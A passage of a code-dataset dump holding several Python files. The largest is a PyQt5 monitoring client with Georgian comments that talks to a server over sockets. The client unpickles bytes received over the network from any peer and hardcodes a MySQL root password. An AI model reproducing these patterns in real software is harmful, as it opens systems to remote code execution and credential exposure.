person)\n\nprint('*' * 100)\n\npersons = 
Person.objects.filter(first_name='Taro').all()\nprint(persons)\nprint(persons[0].email)\nfor person in persons:\n print(person.id, person)","sub_path":"select_sample.py","file_name":"select_sample.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"91303255","text":"\"\"\"\nInterview question: what is the difference between a process and a thread, and how are they related?\nProcess - the basic unit by which the OS allocates memory - a process can contain one or more threads\nThread - the basic unit by which the OS allocates CPU time\nConcurrent programming\n1. Better performance - parts of a program with no causal dependency can run concurrently\n2. Better user experience - time-consuming operations no longer make the program appear frozen\n\"\"\"\n\nimport glob\nimport os\nimport threading\n\nfrom PIL import Image\n\nPREFIX = 'thumbnails'\n\n\ndef generate_thumbnail(infile, size, format='PNG'):\n \"\"\"Generate a thumbnail of the given image file\"\"\"\n file, ext = os.path.splitext(infile)\n file = file[file.rfind('/') + 1:]\n # ext returned by splitext() already includes the leading dot\n outfile = f'{PREFIX}/{file}_{size[0]}_{size[1]}{ext}'\n img = Image.open(infile)\n img.thumbnail(size, Image.ANTIALIAS)\n img.save(outfile, format)\n\n\ndef main():\n \"\"\"Main function\"\"\"\n if not os.path.exists(PREFIX):\n os.mkdir(PREFIX)\n for infile in glob.glob('images/*.png'):\n for size in (32, 64, 128):\n # create and start a thread\n threading.Thread(\n target=generate_thumbnail,\n args=(infile, (size, size))\n ).start()\n\n\nif __name__ == '__main__':\n main()","sub_path":"python_Project/Day_16-20/Day_16-20_并发/prac_1.py","file_name":"prac_1.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"615267835","text":"from django.test import TestCase\n\n# Create your tests here.\n\n\nfrom just_cd.deploy_app.deploy_manager import open_just_config\nimport os\nfrom django.conf import settings\nimport shutil\nimport yaml\n\n\nclass OpenConfigInvalidTestCase(TestCase):\n def setUp(self):\n path = os.path.join(settings.BASE_DIR, 'test_repo')\n if not os.path.isdir(path):\n os.mkdir(path)\n d = {'incorrect': 'test'}\n with open(os.path.join(settings.BASE_DIR, 'test_repo',\n 'just_config.yaml'), 'w') as yaml_file:\n yaml_file.write(yaml.dump(d, default_flow_style=False))\n\n def test_open_config_file_incorrect(self):\n result = open_just_config('test_repo')\n assert ('Deploy' not in result)\n\n def tearDown(self):\n path = os.path.join(settings.BASE_DIR, 'test_repo')\n shutil.rmtree(path)\n","sub_path":"just_cd/deploy_app/tests/test_open_config.py","file_name":"test_open_config.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"294236350","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\" შენიშნები\n1. mysql -დან მონაცემების წამოღება ხდება პირდაპირი კავშირით . მოსაფიქრებელია ალტერნატიული გზა\n2. Segmentation fault (core dumped) ზოგჯერ წერს , სანახავია მიზეზი!!!\n3. 
send_registration_request_to_ies_monitoring_server ფუნქციაში გამოვიყენოთ send_message_to_ies_monitoring_server ++\n\"\"\"\nimport sys\nimport pymysql # 0.9.3\nimport sqlite3\nimport socket\nimport pickle\nimport time\nimport threading\nimport os\nimport argparse\nimport logging\nimport select\nimport datetime\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic # 5.12.2\nfrom message_dialog import Ui_Dialog\n\n# ies_monitor სკრიპტის ip-i რომელზედაც ვიღებთ სერვერიდან შეტყობინებას ies_monitoring_server-დან\n# ip - ს ვგებულობთ სერვერთან დაკავშირების მერე\n# არ არის საჭირო ხელით გაწერა, თავიდან არის ცარიელი\nies_monitor_ip = \"\"\n\n# ies_monitor სკრიპტის port რომელზედაც ვიღებთ სერვერიდან შეტყობინებას ies_monitoring_server-დან\nies_monitor_port = 54321\n\n# log ფაილის სახელი\nlog_filename = \"log\"\n\n# ies_monitoring_server-თან კავშირის შემოწმების მიახლოებითი ინტერვალი წამებში\ntest_ies_monitoring_server_connection_delay = 5\n\n# ies_monitoring_server-ის ip-ი მისამართი\nies_monitoring_server_ip = \"10.0.0.177\"\n\n# ies_monitoring_server-ის პორტი\nies_monitoring_server_port = 12345\n\n# mysql-ის ip მისამართი\nmysql_server_ip = \"localhost\"\n\n# mysql სერვერის user-ი\nmysql_server_user = \"root\"\n\n# mysql-სერვერის user-ის პაროლი\nmysql_user_pass = \"AcharuliXachapuri123!\"\n\n# mysql-სერვერის მონაცემთა ბაზის სახელი\nmysql_database_name = \"ies_monitoring_server\"\n\n# mysql-სერვერის პორტი\nmysql_server_port = 3306\n\n# მესიჯის buffer_size\nbuffer_size = 1036288 # 873114\n\n# დაყო��ნება პროგრამის ისეთ ციკლებში სადაც საჭიროა/რეკომენდირებულია შენელებული მუშაობა\ndelay = 0.1\n\n# ლოდინის დრო, თუ რამდენხანს დაველოდებით შეტყობინების მიღებას კავშირის დამყარების შემდეგ\nwaiting_message_timeout = 60\n\n# ლოდინის დრო, თუ რამდენხანს დაველოდებით შეტყობინების შემდეგი ნაწილის (ბაიტების) მიღებას\nnext_message_bytes_timeout = 30\n\n# დროის ინტერვალი თუ რამდენ წამში ერთხელ ვცადოთ სერვერზე რეგისტრაცია\nregistration_retry_time_interval = 15\n\n\n# -------------------------------------------------------------------------------------------------\n\n\n# კონსტანტები გამოიყენება სერვერთან კავშირის სტატუსის განსაზღვრისთვის\n# სერვერთან კავშირი გაწყვეტილია\nDISCONNECTED = 0\n# სერვერთან დაკავშირებულია\nCONNECTED = 1\n# სერვერთან კავშირის შემოწმება\nTESTING = 2\n\n# მესიჯის ჰედერის სიგრძე\nHEADERSIZE = 10\n\n\nclass ConsoleFormatter(logging.Formatter):\n \"\"\"\n კლასით განვსაზღვრავთ ტერმინალში გამოტანილი მესიჯის ფორმატს.\n\n \"\"\"\n date_format = \"%H:%M:%S\"\n default_format = \"%(asctime)s [%(levelname)s] %(msg)s\"\n info_format = \"%(msg)s\"\n\n def __init__(self):\n super().__init__(fmt=ConsoleFormatter.default_format, datefmt=ConsoleFormatter.date_format, style='%')\n\n def format(self, record):\n # დავიმახსოვროთ თავდაპირველი ფორმატი\n format_orig = self._style._fmt\n\n if record.levelno == logging.INFO:\n self._style._fmt = ConsoleFormatter.info_format\n\n # შევცვალოთ თავდაპირველი ფორმატი\n result = logging.Formatter.format(self, record)\n\n # დავაბრუნოთ თავდაპირველი ფორმატი\n self._style._fmt = format_orig\n\n return result\n\n\n# parser - ის შექმნა\nparser = argparse.ArgumentParser(description=\"???!! 
...დასაწერია პროგრამის განმარტება\")\nparser.add_argument('-d', '--debug', action='store_true', help='ლოგგერის დონის შეცვლა debug ზე')\nargs = parser.parse_args()\n\n# logger - ის შექმნა\nlogger = logging.getLogger('ies_monitoring_server_logger')\nlogger.setLevel(logging.DEBUG)\n\n# შევქმნათ console handler - ი და განვსაზღვროთ დონე და ფორმატი\nconsole_handler = logging.StreamHandler(sys.stdout)\n\n# არგუმენტიდან გამომდინარე დავაყენოთ ტერმინალში ლოგგერის დონე\nif args.debug:\n console_handler.setLevel(logging.DEBUG)\nelse:\n console_handler.setLevel(logging.INFO)\n\nconsole_formatter = ConsoleFormatter()\nconsole_handler.setFormatter(console_formatter)\nlogger.addHandler(console_handler)\n\n# FileHandler - ის შექმნა. დონის და ფორმატის განსაზღვრა\nlog_file_handler = logging.FileHandler(log_filename)\nlog_file_handler.setLevel(logging.DEBUG)\nlog_file_formatter = logging.Formatter(\"%(asctime)s [%(levelname)s] %(message)s\")\nlog_file_handler.setFormatter(log_file_formatter)\nlogger.addHandler(log_file_handler)\n\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n uic.loadUi('main_window.ui', self)\n\n # ცვლადი რომლის საშუალებით პროგრამის დახურვისას ითიშება თრედები\n self.application_is_closing = False\n\n # სერვერთან კავშირის სტატუსი\n self.connection_state = DISCONNECTED\n\n # socket - ობიექტის შექმნა\n self.listener_socket = socket.socket()\n\n # ბოლო მიღებული მესიჯის კატეგორია\n self.last_received_message_category = None\n\n reconnect = QtWidgets.QAction(\"&Reconnect\", self)\n reconnect.triggered.connect(lambda: self.send_registration_request_to_ies_monitoring_server())\n\n menu_bar = self.menuBar()\n connect_menu = menu_bar.addMenu('&Connection')\n connect_menu.addAction(reconnect)\n\n # QAction ობიექტის შექმნა\n main_window_close_action = QtWidgets.QAction(\"Quit\", self)\n\n # main_window_close_action ხდომილების შემთხვევაში გამოვიძახოთ main_window_close_event ფუნქცია\n main_window_close_action.triggered.connect(self.closeEvent)\n\n # message_table - ზე ორჯერ დაჭერით გამოვიძახოთ message_table_double_click\n self.message_table.doubleClicked.connect(self.message_table_double_click)\n\n # ???\n self.mysql_table_col_names = [\n \"message_id\", \"sent_message_datetime\", \"message_type\",\n \"message_title\", \"text\", \"client_ip\", \"client_script_name\"\n ]\n\n # ???\n self.mysql_table_col_readable_names = [\n \"ID\", \"Time\", \"Message Type\",\n \"Message Title\", \"Message\",\n \"Client IP\", \"Script Name\"\n ]\n\n # ეშვება update_connection_status ფუნქცია თრედად\n threading.Thread(target=self.update_connection_status).start()\n\n # ეშვება communicate_to_ies_monitoring_server_thread ფუნქცია თრედად\n threading.Thread(target=self.communicate_to_ies_monitoring_server_thread).start()\n\n # ვიძახებთ set_qtablewidget_style ფუნქციას\n self.set_qtablewidget_style()\n\n # ვიძახებთ connect_to_mysql ფუნქციას\n self.connect_to_mysql()\n\n # ვიძახებთ load_messages_from_mysql ფუნქციას\n self.load_messages_from_mysql()\n\n # ვიძახებთ connect_to_sqlite ფუნქციას\n self.connect_to_sqlite()\n\n # ვიძახებთ check_opened_messages ფუნქციას\n self.check_opened_messages()\n\n def update_connection_status(self):\n \"\"\" ფუნქცია სტატუს ბარში აჩვენებს ies_monitoring_server -თან კავშირის სტატუსს \"\"\"\n\n while self.application_is_closing is False:\n if self.connection_state is CONNECTED:\n self.statusbar.showMessage(\"CONNECTED\")\n elif self.connection_state is TESTING:\n self.statusbar.showMessage(\"TESTING\")\n elif self.connection_state is 
DISCONNECTED:\n self.statusbar.showMessage(\"DISCONNECTED\")\n time.sleep(delay)\n\n def connect_ies_monitoring_server(self, verbose=True):\n \"\"\" ფუნქცია უკავშირდება ies_monitoring_server-ს \"\"\"\n\n # connection სოკეტის შექმნა\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n # დავუკავშირდეთ ies_monitoring_server-ს\n connection.connect((ies_monitoring_server_ip, ies_monitoring_server_port))\n if verbose is True:\n logger.debug(\"სერვერთან კავშირი დამყარებულია\")\n except Exception as ex:\n if verbose is True:\n logger.warning(\"სერვერთან კავშირი ვერ დამყარდა. \" + str(ex))\n return False\n return connection\n\n def connection_close(self, connection, addr=None):\n \"\"\" ხურავს (კავშირს სერვერთან) პარამეტრად გადაცემულ connection socket ობიექტს \"\"\"\n\n if addr is None:\n logger.debug(\"listener_socket სოკეტის დახურვა \" + str(connection.getsockname()))\n else:\n logger.debug(\"კავშირის დახურვა \" + str(addr))\n connection.shutdown(socket.SHUT_RDWR)\n connection.close()\n\n def communicate_to_ies_monitoring_server_thread(self):\n \"\"\"\n ფუნქცია ამოწმებს სერვერთან კავშირს, კავშირის დამყარების შემთხვევაში ვგებულობთ მიმდინარე\n ies_monitor-ის ip-ის, ეშვება listening_to_ies_monitoring_server ფუნქცია (ies_monitor-იწყებს მოსმენას)\n და ვაგზავნით რეგისტრაციის მოთხოვნას სანამ სერვერი არ გამოაგზავნის რეგისტრაციის დადასტურებას\n\n \"\"\"\n\n # ies_monitoring_server-თან დაკავშირება\n connection = self.connect_ies_monitoring_server(verbose=False)\n\n # სერვერთან დაკავშირების მცდელობის დრო\n test_server_connection_datetime = datetime.datetime.now()\n\n # ციკლი სერვერთან დასაკავშირებლად. ციკლიდან გამოვდივართ იმ შემთხვევაში თუ\n # კავშირი დამყარდა სერვერთან ან თუ პროგრამა იხურება\n while connection is False and self.application_is_closing is False:\n # შევამოწმოთ თუ სერვერთან დაკავშირების ცდიდან გავიდა test_ies_monitoring_server_connection_delay წამი\n if (datetime.datetime.now() - test_server_connection_datetime) > datetime.timedelta(seconds=test_ies_monitoring_server_connection_delay):\n logger.warning(\"პროგრამის ჩატვირთვის პროცესში ვერ მოხერხდა სერვერთან დაკავშირება\")\n # ies_monitoring_server-თან დაკავშირება\n connection = self.connect_ies_monitoring_server(verbose=False)\n\n # სერვერთან დაკავშირების მცდელობის დრო\n test_server_connection_datetime = datetime.datetime.now()\n\n # დაყოვნება\n time.sleep(delay)\n\n # თუ კავშირი დამყარდა ies_monitoring_server-თან\n if connection is not False:\n global ies_monitor_ip\n\n # შევინახოთ მიმდინარე ies_monitor-ის ip\n ies_monitor_ip = connection.getsockname()[0]\n\n logger.debug(\"პროგრამის ჩატვირთვის პროცესში სერვერთან კავშირი დამყარდა და განისაზღვრა \"\n \"ies_monitor-ის ip მისამართი: {}\".format(ies_monitor_ip))\n # ies_monitor-იწყებს მოსმენას\n threading.Thread(target=self.listening_to_ies_monitoring_server).start()\n\n self.register_to_ies_monitoring_server()\n\n def register_to_ies_monitoring_server(self):\n \"\"\" ფუნქცია აგზავნის რეგისტრაციის მოთხოვნას ies_monitoring_server -თან და ელოდება მისგან დასტურს \"\"\"\n\n # სერვერთან გასაგზავნი შეტყობინება\n server_message = {\n \"who_am_i\": \"ies_monitor\",\n \"message_category\": \"registration\",\n \"ip\": ies_monitor_ip,\n \"port\": ies_monitor_port\n }\n\n # რეგისტრაციის მოთხოვნის გაგზავნა\n registration_message_sent = self.send_registration_request_to_ies_monitoring_server(server_message)\n # რეგისტრაციის მოთხოვნის გაგზავნის მცდელობის დრო\n try_sent_registration_datetime = datetime.datetime.now()\n\n # ციკლი სერვერთან რეგისტრაციის შეტყობინების გასაგზავნად\n # ციკლიდან 
გამოვდივართ იმ შემთხვევაში თუ რეგისრაციის შეტყობინება გაიგზავნა\n # ან თუ პროგრამა იხურება\n while registration_message_sent is False and self.application_is_closing is False:\n # შევამოწმოთ თუ სერვერთან რეგისტრაციის შეტყობინების გაგზავნის ცდიდან გავიდა test_ies_monitoring_server_connection_delay წამი\n if (datetime.datetime.now() - try_sent_registration_datetime) > datetime.timedelta(seconds=test_ies_monitoring_server_connection_delay):\n # რეგისტრაციის მოთხოვნის გაგზავნა\n registration_message_sent = self.send_registration_request_to_ies_monitoring_server(server_message)\n if registration_message_sent is True:\n # ფუნქცია ელოდე��ა registration_verified კატეგორიის შეტყობინების მოსვლას\n self.wait_for_ies_monitoring_server_response(\"registration_verified\", registration_retry_time_interval, server_message, self.register_to_ies_monitoring_server)\n\n # ფუნქცია ამთავრებს მუშაობას თუ სერვერიდან დაბრუნდა რეგისტრაციაზე მოთხოვნის პასუხი\n return\n # რეგისტრაციის მოთხოვნის გაგზავნის მცდელობის დრო\n try_sent_registration_datetime = datetime.datetime.now()\n # დაყოვნება\n time.sleep(delay)\n\n # ფუნქცია ელოდება registration_verified კატეგორიის შეტყობინების მოსვლას\n self.wait_for_ies_monitoring_server_response(\"registration_verified\", registration_retry_time_interval, server_message, self.register_to_ies_monitoring_server)\n\n def send_message_to_ies_monitoring_server(self, message):\n \"\"\" ფუნქციიის საშუალებით შეიძლება შეტყობინების გაგზავნა ies_monitoring_server-თან \"\"\"\n\n # ies_monitoring_server-თან დაკავშირება\n ies_monitoring_server_connection = self.connect_ies_monitoring_server(verbose=False)\n\n # ies_monitoring_server-თან კავშირის შემოწმება\n if ies_monitoring_server_connection is False:\n logger.warning(\"შეტყობინება ვერ გაიგზავნა, ies_monitoring_server-თან კავშირი ვერ დამყარდა\\n{}\"\n .format(message))\n # ფუნქცია აბრუნებს False -ს ნიშნად იმისა რომ მესიჯი ვერ გაიგზავნა სერვერზე\n return False\n\n try:\n # შეტყობინების გაგზავნა\n ies_monitoring_server_connection.send(self.dictionary_message_to_bytes(message))\n logger.debug(\"შეტყობინება გაიგზავნა ies_monitoring_server-თან\\n{}\"\n .format(message))\n except Exception as ex:\n logger.warning(\"შეტყობინება ვერ გაიგზავნა ies_monitoring_server-თან\\n{}\\n{}\"\n .format(message, str(ex)))\n\n # ფუნქცია აბრუნებს False -ს ნიშნად იმისა რომ მესიჯი ვერ გაიგზავნა სერვერზე\n return False\n\n # სოკეტის დახურვა\n self.connection_close(ies_monitoring_server_connection, ies_monitoring_server_connection.getsockname())\n\n # ფუნქცია აბრუნებს True -ს ნიშნად იმისა რომ მესიჯი წარმატებით გაიგზავნა სერვერზე\n return True\n\n def send_database_pull_request_to_ies_monitoring_server(self):\n \"\"\" ფუნქციის საშუალებით ies_monitoring_server-ს ეგზავნება მონაცემთა ბაზის გამოგზავნის მოთხოვნა \"\"\"\n\n # database_pull_request პაკეტის შექმნა\n server_message = {\n \"who_am_i\": \"ies_monitor\",\n \"message_category\": \"database_pull_request\",\n \"ip\": ies_monitor_ip,\n \"port\": ies_monitor_port,\n \"last_message_id\": 0\n }\n\n # database_pull_request პაკეტის გაგზავნა\n self.send_message_to_ies_monitoring_server(server_message)\n\n # ფუნქცია ელოდება message_data კატეგორიის შეტყობინების მოსვლას\n self.wait_for_ies_monitoring_server_response(\"message_data\", 10, server_message)\n\n def wait_for_ies_monitoring_server_response(self, message_category, wait_time, message, function_name=None, args=()):\n \"\"\"\n ფუნქციის საშუალებით ვაკვირდებით გაგზავნილი შეტყობინების პასუხს\n message_category - პარამეტრით ეთითება მესიჯის კატეგორია რომელსაც ველოდებით 
სერვერისგან პასუ��ად\n wait_time - პარამეტრით ეთითება დრო წამებში თუ რა დროის მანძილზე ველოდებით სერვერისგან პასუხს. იმ\n შემთხვევაში თუ მითითებული დროის განმავლობაში სერვერიდან არ მოვიდა პასუხი, ფუნქცია თვლის რომ\n სერვერს არ მიუღია გაგზავნილი შეტყობინება\n \"\"\"\n\n # მესიჯის გაგზავნის დრო\n message_sent_time = datetime.datetime.now()\n\n # მუდმივი ციკლის საშუალებით ველოდებით გაგზავნილ შეტყობინებაზე პასუხს\n while self.last_received_message_category != message_category and self.application_is_closing is False:\n # შევამოწმოთ რა დრო გავიდა გაგზავნილი შეტყობინების შემდეგ\n if (datetime.datetime.now() - message_sent_time) > datetime.timedelta(seconds=wait_time):\n logger.warning(\"სერვერიდან არ მოვიდა პასუხი შეტყობინებაზე: \\n{}\".format(message))\n if function_name is not None:\n function_name(*args)\n # ციკლის დასრულება\n break\n # დაყოვნება\n time.sleep(delay)\n logger.debug(\"სერვერიდან მოვიდა პასუხი შეტყობინებაზე: \\n{}\".format(message))\n\n def testing_connection_to_ies_monitoring_server(self): # ???\n \"\"\" ფუნქცია უგზავნის Hello პაკეტებს ies_monitoring_server -ს რითაც მოწმდება კავშირის არსებობა \"\"\"\n\n # Hello პაკეტის შექმნა\n server_message = {\n \"who_am_i\": \"ies_monitor\",\n \"message_category\": \"hello\",\n \"ip\": ies_monitor_ip,\n \"port\": ies_monitor_port\n }\n\n # Hello პაკეტის გაგზავნა\n self.send_message_to_ies_monitoring_server(server_message)\n\n # შევინახოთ Hello პაკეტის გაგზავნის დრო\n sent_datetime = datetime.datetime.now()\n\n # პაკეტის გაგზავნის დროს ითვლება რომ კავშირი არ გვაქვს სერვერთან\n self.connection_state = TESTING\n\n # ციკლი რომელიც მუდმივად აგზავნის Hello პაკეტებს\n while True and self.application_is_closing is False:\n if (datetime.datetime.now() - sent_datetime) > datetime.timedelta(seconds=test_ies_monitoring_server_connection_delay):\n # Hello პაკეტის გაგზავნა\n self.send_message_to_ies_monitoring_server(server_message)\n\n # შევინახოთ Hello პაკეტის გაგზავნის დრო\n sent_datetime = datetime.datetime.now()\n\n # პაკეტის გაგზავნის დროს ითვლება რომ კავშირი არ გვაქვს სერვერთან\n self.connection_state = TESTING\n\n # ციკლი რომელიც ელოდება სერვერიდან Hello პაკეტის მიღებას\n while self.connection_state is TESTING:\n # ციკლის სტაბილური მუშაობისთვის\n time.sleep(delay)\n\n # შევამოწმოთ რა დრო გავიდა Hello პაკეტის გაგზავნის შემდეგ\n if (datetime.datetime.now() - sent_datetime) > datetime.timedelta(seconds=test_ies_monitoring_server_connection_delay * 2):\n self.connection_state = DISCONNECTED\n logger.warning(\"სერვერთან კავშირი გაწყდა\")\n self.register_to_ies_monitoring_server()\n return\n\n # ციკლის სტაბილური მუშაობისთვის\n time.sleep(delay)\n\n def response_ies_monitoring_server(self, message, addr):\n \"\"\"\n ფუნქცია განას���ვავებს ies_monitoring_server -ისგან მიღებულ შეტყობინებებს\n 1. თუ მოსულია registration_verified შეტყობინება მაშინ ies_monitoring_server -თან კავშირის სტატუსი ხდება \"CONNECTED\" და\n ეშვება testing_connection_to_ies_monitoring_server თრედი\n 2. თუ მოსულია database_updated შეტყობინება ეს ნიშნავს, რომ ies_monitoring_server -ის მონაცემთა ბაზაში\n დაემატა ახალი შეტყობინება და შესაბამისად უნდა მოხდეს მონაცემების ხელახალი წამოღება\n 3. 
თუ მოსულია hello პაკეტი მაშინ ies_monitoring_server -თან კავშირის სტატუსი ხდება \"CONNECTED\"\n \"\"\"\n\n # შევამოწმოთ message dictionary-ის თუ აქვს message_category ინდექსი\n if \"message_category\" not in message:\n logger.warning(\"response_ies_monitoring_server ფუნქციას მიეწოდა message dictionary \\\n რომელსაც არ აქვს message_category key-ი\")\n return\n\n # შევამოწმოთ მესიჯის კატეგორია\n if message[\"message_category\"] == \"registration_verified\":\n logger.info(\"ies_monitor-ი წარმატებით დარეგისტრირდა ies_monitoring_server-ზე\")\n self.registration_verified = True\n self.connection_state = CONNECTED\n self.last_received_message_category = message[\"message_category\"]\n\n # ეშვება თრედი რომელიც მუდმივად ამოწმებს სერვერთან კავშირს\n threading.Thread(target=self.testing_connection_to_ies_monitoring_server).start()\n threading.Thread(target=self.send_database_pull_request_to_ies_monitoring_server).start()\n\n elif message[\"message_category\"] == \"database_updated\":\n logger.info(\"სერვერიდან მოვიდა შეტყობინება იმის შესახებ, რომ მის მონაცემთა ბაზაში დაემატა ახალი შეტყობინება\")\n\n self.load_messages_from_mysql()\n\n # ვიძახებთ connect_to_sqlite ფუნქციას\n self.connect_to_sqlite()\n\n # ვიძახებთ check_opened_messages ფუნქციას\n self.check_opened_messages()\n\n elif message[\"message_category\"] == \"hello\":\n self.connection_state = CONNECTED\n logger.debug(\"სერვერიდან მოვიდა hello შეტყობინება იმის დასტურად რომ სერვერი ხელმისაწვდომია\")\n\n elif message[\"message_category\"] == \"message_data\":\n # ვინახავთ ბოლოს მიღებული შეტყობინების კატეგორიას\n self.last_received_message_category = message[\"message_category\"]\n\n def server_message_handler_thread(self, connection, addr):\n \"\"\" ფუნქცია ამუშავებს მიღებულ შეტყობინებებს წასაკითხად და განასხვავებს გამომგზავნს \"\"\"\n\n receiving_message_time_duraction = datetime.datetime.now()\n\n while self.application_is_closing is False:\n\n # ციკლის შეჩერება 0.1 წამით\n time.sleep(delay)\n\n if (datetime.datetime.now() - receiving_message_time_duraction) > datetime.timedelta(seconds=waiting_message_timeout):\n # ლოგია ჩასამატებელი???\n\n # კავშირის დახურვა\n self.connection_close(connection, addr)\n\n # ფუნქციიდან გამოსვლა\n return\n\n # select.select ფუნქცია აბრუნებს readers list-ში ისეთ socket-ებს რომელშიც მოსულია წასაკითხი ინფორმაცია\n # ბოლო პარამეტრად მითითებული გვაქვს 0 რადგან ფუნქცია არ დაელოდოს ისე��� სოკეტს რომელზეც შეიძლება წაკითხვა\n readers, _, _, = select.select([connection], [], [], 0)\n\n # შევამოწმოთ readers list-ი თუ არ არის ცარიელი, რაც ამ შემთხვევაში ნიშნავს იმას რომ connection\n # socket-ზე მოსულია წასაკითხი ინფორმაცია\n if readers:\n # ცვლადი სადაც ვინახავთ მესიჯის ჰედერს და თვითონ მესიჯს\n header_and_message = b''\n\n # ახალი მესიჯი\n new_message = True\n\n # მესიჯის მოსვლის დრო\n message_receive_time = datetime.datetime.now()\n\n # მუდმივი ციკლი მესიჯის წასაკითხათ\n while self.application_is_closing is False:\n # დაყოვნება\n time.sleep(delay)\n\n if (datetime.datetime.now() - message_receive_time) > datetime.timedelta(seconds=next_message_bytes_timeout):\n # კავშირის დახურვა\n self.connection_close(connection, addr)\n\n # logger ის გამოძახება\n # logger.warning(\"{} გამოგზავნილი მესიჯი არ მოვიდა სრულად. 
გამოგზავნილი მესიჯის ბაიტების რაოდენობა: {}.\"\n # \"მიღებული მესიჯის ბაიტების რაოდენობა: {}.\"\n # \" მიღებული მესიჯის ნაწილი:\\n{}\"\n # .format(str(addr), message_length, received_message_length, header_and_message.decode(\"utf-8\")))\n\n # ფუნქციიდან გამოსვლა\n return\n\n readers, _, _, = select.select([connection], [], [], 0)\n\n # შევამოწმოთ readers list-ი თუ არ არის ცარიელი, რაც ამ შემთხვევაში ნიშნავს იმას რომ connection\n # socket-ზე მოსულია წასაკითხი ინფორმაცია\n if readers:\n # ახალი მესიჯი\n # new_message = True\n\n # წავიკითხოთ გამოგზავნილი მესიჯის ან მესიჯის ნაწილი\n message_bytes = connection.recv(buffer_size)\n\n # იმ შემთხვევაში თუ კავშირი გაწყდა message_bytes იქნება ცარიელი\n if not message_bytes:\n # კავშირის დახურვა\n self.connection_close(connection)\n\n # ფუნქციიდან გამოსვლა\n return\n\n # მესიჯის მიღების დრო\n message_receive_time = datetime.datetime.now()\n\n # თუ მესიჯის წაკითხვა დაიწყო\n if new_message is True:\n\n # მესიჯის სიგრძის/ჰედერის წაკითხვა.\n message_length = int(message_bytes[:HEADERSIZE])\n\n # მესიჯის ჰედერის წაკითხვის დასასრული\n new_message = False\n\n # მესიჯის შეგროვება\n header_and_message += message_bytes\n\n # დავთვალოთ წაკითხული მესიჯის სიგრძე ჰედერის გარეშე\n received_message_length = len(header_and_message) - HEADERSIZE\n\n # შევამოწმოთ თუ წავიკითხეთ მთლიანი მესიჯი\n if received_message_length == message_length:\n try:\n # მესიჯის აღდგენა, bytes-ს ტიპიდან dictionary ობი���ქტში გადაყვანა\n message = pickle.loads(header_and_message[HEADERSIZE:])\n except Exception as ex:\n # logger -ის გამოძახება\n logger.warning(\"მიღებული მესიჯის bytes-ს ტიპიდან dictionary ობიექტში გადაყვანისას დაფიქსირდა შეცდომა: \\n{}\".format(str(ex)))\n\n # კავშირის დახურვა\n self.connection_close(connection, addr)\n # ფუნქციიდან გამოსვლა\n return\n\n # ციკლიდან გამოსვლა\n break\n elif received_message_length > message_length:\n try:\n # მესიჯის აღდგენა, bytes-ს ტიპიდან dictionary ობიექტში გადაყვანა\n message = pickle.loads(header_and_message[HEADERSIZE:])\n except Exception as ex:\n # logger -ის გამოძახება\n logger.warning(\"მოსული მესიჯის სიგრძემ გადააჭარბა ჰედერში მითითებულ მოსალოდნელ სიგრძეს\")\n\n # logger -ის გამოძახება\n logger.warning(\"მიღებული მესიჯის bytes-ს ტიპიდან dictionary ობიექტში გადაყვანისას დაფიქსირდა შეცდომა: \\n{}\"\n .format(str(ex)))\n\n # კავშირის დახურვა\n self.connection_close(connection, addr)\n # ფუნქციიდან გამოსვლა\n return\n\n # logger -ის გამოძახება\n logger.warning(\"მოსული მესიჯის სიგრძემ გადააჭარბა ჰედერში მითითებულ მოსალოდნელ სიგრძეს. 
მესიჯი: \\n{}\".format(message))\n\n # კავშირის დახურვა\n self.connection_close(connection, addr)\n # ფუნქციიდან გამოსვლა\n return\n\n # შევამოწმოთ თუ message dictionary-ის არ აქვს who_am_i key-ი\n if \"who_am_i\" not in message:\n logger.warning(\"მოსულია ისეთი შეტყობინება რომელსაც არ აქვს who_am_i key-ი\")\n # თუ არ გვაქვს who_am_i key-ი ესეიგი მოსულია საეჭვო მესიჯი და ვხურავთ თრედს\n break\n\n # შევამოწმოთ თუ შეტყობინება მოსულია ies_monitor.py - სგან\n elif message[\"who_am_i\"] == \"ies_monitoring_server\":\n self.response_ies_monitoring_server(message, addr)\n break\n\n def listening_to_ies_monitoring_server(self):\n \"\"\" ფუნქცია ხსნის პორტს და იწყებს მოსმენას \"\"\"\n\n # ვუთითებთ სოკეტის პარამეტრებს\n self.listener_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n # მოსმენის დაწყება\n self.listener_socket.bind((ies_monitor_ip, ies_monitor_port))\n\n # ვუთითებთ მაქსიმალურ კლიენტების რაოდენობას ვინც ელოდება კავშირის დამყარებაზე თანხმობას\n self.listener_socket.listen(10)\n\n logger.debug(\"ies_monitor-ი მზად არის შეტყობინების მისაღებად\")\n\n while self.application_is_closing is False:\n try:\n # თუ client-ი მზად არის კავშირის დასამყარებლად დავეთანხმოთ\n connection, addr = self.listener_socket.accept()\n\n # გამოაქვს დაკავშირებული კლიენტის მისამართი\n logger.debug(\"შეტყობინების გამოსაგზავნად დაგვიკავშირდა: \" + str(addr))\n\n # თითოეულ დაკავშირებულ client-ისთვის შევქმნათ და გავუშვათ\n # ცალკე thread-ი client_handler_thread ფუნქციის საშუალებით\n threading.Thread(target=self.server_message_handler_thread, args=(connection, addr)).start()\n except socket.error:\n break\n except Exception as ex:\n logger.error(\"შეცდომა listening_to_ies_monitoring_server Thread-ში:\\n\" + str(ex))\n break\n\n def dictionary_message_to_bytes(self, message):\n \"\"\" ფუნქციას dictionary ტიპის მესიჯი გადაყავს bytes ტიპში და თავში უმატებს header-ს \"\"\"\n\n # dictionary გადადის bytes ტიპში (serialization)\n message_bytes = pickle.dumps(message)\n\n # მესიჯის სიგრძე დათვლა\n message_length = len(message_bytes)\n\n # header-ი გადავიყვანოთ ბაიტებში და დავუმატოთ გადაყვანილი მესიჯი byte-ებში\n message_bytes = bytes(str(message_length).ljust(HEADERSIZE), 'utf-8') + message_bytes\n\n # ფუნქცია 